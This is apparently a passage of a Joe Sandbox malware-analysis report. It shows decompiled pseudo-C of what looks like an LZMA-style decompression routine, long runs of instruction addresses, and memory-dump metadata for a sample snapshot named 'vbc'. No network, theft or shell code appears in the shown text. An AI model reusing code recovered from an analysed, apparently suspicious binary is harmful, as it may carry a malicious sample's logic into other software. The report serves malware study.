								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                          0x00000000
                          0x00406398
                          0x00406398
                          0x0040639c
                          0x00406453
                          0x00406456
                          0x00406462
                          0x00406343
                          0x00406343
                          0x00406346
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x0040672e
                          0x0040672e
                          0x00406734
                          0x00406734
                          0x00000000
                          0x00406709
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x00000000
                          0x004068bc
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x00000000
                          0x0040672b
                          0x004063a2
                          0x004063a6
                          0x004068e7
                          0x004068e7
                          0x004068ea
                          0x004068ee
                          0x004068ee
                          0x004063ac
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x004068d2
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x00000000
                          0x004068e3
                          0x004063c6
                          0x004063c9
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x004063fa
                          0x004063fa
                          0x004063fa
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00000000
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x00000000
                          0x004060d9
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x0040609e
                          0x0040609e
                          0x004060a1
                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x004060b5
                          0x00000000
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x00000000
                          0x00000000
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x00000000
                          0x00406424
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x00000000
                          0x004066b5
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00000000
                          0x00406828
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x00000000
                          0x0040667d
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf

                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                          • Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
                          • Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
                          • Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405E9D Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                          Download Yara Rule
                          C-Code - Quality: 98%
                          			E00405E9D(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
